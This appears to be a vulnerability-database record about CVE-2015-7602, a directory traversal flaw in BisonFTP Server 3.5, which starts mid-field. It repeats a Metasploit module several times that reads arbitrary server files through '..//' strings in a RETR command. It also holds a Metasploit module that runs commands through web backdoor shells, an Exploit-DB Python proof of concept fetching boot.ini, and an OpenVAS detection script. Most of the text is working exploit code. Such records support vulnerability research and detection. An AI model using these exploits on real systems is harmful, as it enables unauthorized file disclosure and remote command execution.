initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, relative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-22T03:44:49", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 102}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "27bddcd8a2ba3e855182a2bdf109115e", "type": "metasploit", "bulletinFamily": "exploit", "title": "Simple Backdoor Shell Remote Code Execution", "description": "This module exploits unauthenticated simple web backdoor shells by leveraging the common backdoor shell's vulnerable parameter to execute commands. 
The SecLists project of Daniel Miessler and Jason Haddix has a lot of samples for these kind of backdoor shells which is categorized under Payloads.\n", "published": "2015-09-08T05:08:47", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://resources.infosecinstitute.com/checking-out-backdoor-shells/", "https://github.com/danielmiessler/SecLists/tree/master/Payloads"], "cvelist": [], "lastseen": "2019-10-23T20:04:18", "history": [], "viewCount": 85, "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2019-10-23T20:04:18"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310704548", "OPENVAS:1361412562310704547", "OPENVAS:1361412562310143041", "OPENVAS:1361412562310143042", "OPENVAS:1361412562310891968", "OPENVAS:1361412562310108682", "OPENVAS:1361412562310891967", "OPENVAS:1361412562310891961", "OPENVAS:1361412562310891962", "OPENVAS:1361412562310113545"]}, {"type": "threatpost", "idList": ["THREATPOST:9BC1B113CDD3C86D30DEB5648D4DB177"]}, {"type": "tenable", "idList": ["TENABLE:0233D53A82E16C59E35C51B21491BD62"]}, {"type": "redhat", "idList": ["RHSA-2019:3168"]}, {"type": "thn", "idList": ["THN:9269E53DB7E4D99ED8A3314F02869A30"]}, {"type": "symantec", "idList": ["SMNTC-110570"]}, {"type": "mozilla", "idList": ["MFSA2019-34", "MFSA2019-33"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:F049AE2BB0739D7D9D8E368907DF1C29"]}], "modified": "2019-10-23T20:04:18"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/simple_backdoors_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n 
super(update_info(info,\n 'Name' => 'Simple Backdoor Shell Remote Code Execution',\n 'Description' => %q{\n This module exploits unauthenticated simple web backdoor shells by leveraging the\n common backdoor shell's vulnerable parameter to execute commands. The SecLists project of\n Daniel Miessler and Jason Haddix has a lot of samples for these kind of backdoor shells\n which is categorized under Payloads.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Jay Turla <@shipcod3>',\n ],\n 'References' =>\n [\n [ 'URL', 'http://resources.infosecinstitute.com/checking-out-backdoor-shells/' ],\n [ 'URL', 'https://github.com/danielmiessler/SecLists/tree/master/Payloads' ] # Most PHP Web Backdoors Listed\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 2000,\n 'BadChars' => '',\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd'\n }\n },\n 'Platform' => %w{ unix win },\n 'Arch' => ARCH_CMD,\n 'Targets' =>\n [\n ['backdoor / Unix', { 'Platform' => 'unix' } ],\n ['backdoor / Windows', { 'Platform' => 'win' } ]\n ],\n 'DisclosureDate' => 'Sep 08 2015',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The path of a backdoor shell', 'cmd.php']),\n OptString.new('VAR', [true, 'The command variable', 'cmd']),\n OptEnum.new('METHOD', [true, 'HTTP Method', 'GET', ['GET', 'POST', 'PUT']])\n ])\n end\n\n def check\n test = Rex::Text.rand_text_alpha(8)\n http_send_command(test)\n if res && res.body =~ /#{test}/\n return Exploit::CheckCode::Vulnerable\n end\n return Exploit::CheckCode::Safe\n end\n\n def http_send_command(cmd)\n res = send_request_cgi({\n 'method' => datastore['METHOD'],\n 'uri' => normalize_uri(target_uri.path),\n 'vars_get' => {\n datastore['VAR'] => cmd\n }\n })\n unless res && res.code == 200\n fail_with(Failure::Unknown, \"Failed to execute the command.\")\n end\n res\n end\n\n def exploit\n http_send_command(payload.encoded)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": 
""}, "lastseen": "2019-10-23T20:04:18", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 103}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "59a376e9ba7a4108fbda54f00d9010b2", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2019-10-03T16:47:49", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-10-23T22:07:07", "history": [], "viewCount": 86, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-10-23T22:07:07"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-10-23T22:07:07"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information 
Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, relative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-23T22:07:07", "differentElements": ["modified", "published"], "edition": 104}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6ca196d549fd238df143ba70fad1099a", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-11-22T06:36:24", "history": [], "viewCount": 86, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-11-22T06:36:24"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-11-22T06:36:24"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, relative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-11-22T06:36:24", "differentElements": ["modified", "published"], "edition": 105}], "viewCount": 87, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-11-22T08:34:01"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-11-22T08:34:01"}, "vulnersScore": 5.7}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include 
Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, relative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that 
we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:14:44", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in BisonWare BisonFTP 3.5 allows remote attackers to read arbitrary files via a ../ (dot dot slash) in a RETR command.", "modified": "2015-10-13T16:52:00", "id": "CVE-2015-7602", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7602", "published": "2015-09-29T19:59:00", "title": "CVE-2015-7602", "type": "cve", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}], "exploitdb": [{"lastseen": "2016-02-04T07:52:44", "bulletinFamily": "exploit", "description": "BisonWare BisonFTP Server 3.5 - Directory Traversal Vulnerability. CVE-2015-7602. Remote exploit for windows platform", "modified": "2015-09-28T00:00:00", "published": "2015-09-28T00:00:00", "id": "EDB-ID:38341", "href": "https://www.exploit-db.com/exploits/38341/", "type": "exploitdb", "title": "BisonWare BisonFTP Server 3.5 - Directory Traversal Vulnerability", "sourceData": "#!/usr/bin/python\r\n# title: BisonWare BisonFTP server product V3.5 Directory Traversal Vulnerability\r\n# author: Jay Turla <@shipcod3>\r\n# tested on Windows XP Service Pack 3 - English\r\n# software link: https://www.exploit-db.com/apps/081331edfc143738a60e029192b5986e-BisonFTPServer.rar\r\n# description: BisonWare BisonFTP server product V3.5 is vulnerable to Directory Traversal (quick and dirty code just for PoC) \r\n\r\nfrom ftplib import FTP\r\n\r\nftp = FTP(raw_input(\"Target IP: \")) \r\nftp.login() \r\nftp.retrbinary('RETR ../../../boot.ini', open('boot.ini.txt', 'wb').write)\r\nftp.close()\r\nfile = open('boot.ini.txt', 'r')\r\nprint \"[**] Printing what's inside boot.ini\\n\"\r\nprint \"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\"\r\nprint file.read()\r\nprint \"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\"\r\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/38341/"}], "openvas": [{"lastseen": 
"2019-05-29T18:36:08", "bulletinFamily": "scanner", "description": "This host is running BisonWare BisonFTP Server\n and is prone to directory traversal vulnerability.", "modified": "2019-02-07T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310805753", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805753", "title": "BisonWare BisonFTP Server Directory Traversal Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_bisonware_bisonftp_server_dir_trav_vuln.nasl 13517 2019-02-07 07:51:12Z mmartin $\n#\n# BisonWare BisonFTP Server Directory Traversal Vulnerability\n#\n# Authors:\n# Deependra Bapna <bdeependra@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:bisonware:bison_ftp_server\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805753\");\n script_version(\"$Revision: 13517 $\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-07 08:51:12 +0100 (Thu, 07 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 12:41:58 +0530 (Tue, 29 Sep 2015)\");\n script_cve_id(\"CVE-2015-7602\");\n script_name(\"BisonWare BisonFTP Server Directory Traversal Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is running BisonWare BisonFTP Server\n and is prone to directory traversal vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send the crafted directory traversal attack\n request and check whether it is able to read the system file or not.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to error in handling of\n file names. It does not properly sanitise filenames containing directory traversal\n sequences that are received from an FTP server.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to read arbitrary files on the affected application.\");\n\n script_tag(name:\"affected\", value:\"BisonWare BisonFTP Server version 3.5.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability.\n Likely none will be provided anymore. 
General solution options are to upgrade to a newer release, disable respective features, remove the\n product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/38341\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"FTP\");\n script_dependencies(\"gb_bisonware_bisonftp_server_detect.nasl\");\n script_mandatory_keys(\"BisonWare/Ftp/Installed\");\n script_require_ports(\"Services/ftp\", 21);\n exit(0);\n}\n\ninclude(\"ftp_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\nftpPort = get_app_port(cpe:CPE);\nif(!ftpPort){\n exit(0);\n}\n\nsoc = open_sock_tcp(ftpPort);\nif(!soc){\n exit(0);\n}\n\nkb_creds = ftp_get_kb_creds();\nuser = kb_creds[\"login\"];\npass = kb_creds[\"pass\"];\n\nlogin_details = ftp_log_in(socket:soc, user:user, pass:pass);\nif(!login_details)\n{\n close(soc);\n exit(0);\n}\n\nftpPort2 = ftp_get_pasv_port(socket:soc);\nif(!ftpPort2)\n{\n close(soc);\n exit(0);\n}\n\nsoc2 = open_sock_tcp(ftpPort2, transport:get_port_transport(ftpPort));\nif(!soc2)\n{\n close(soc);\n exit(0);\n}\n\nfiles = traversal_files( \"Windows\" );\n\nforeach pattern( keys( files ) ) {\n\n file = files[pattern];\n file = \"../../../\" + file;\n req = string(\"RETR \", file);\n send(socket:soc, data:string(req, \"\\r\\n\"));\n\n res = ftp_recv_data(socket:soc2);\n\n if( res && match = egrep( string:res, pattern:\"(\" + pattern + \"|\\WINDOWS)\", icase:TRUE ) ) {\n report = \"Used request: \" + req + '\\n';\n report += \"Received data: \" + match;\n security_message(port:ftpPort, data:report);\n close(soc2);\n close(soc);\n exit(0);\n }\n}\n\nclose(soc);\nclose(soc2);", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}]}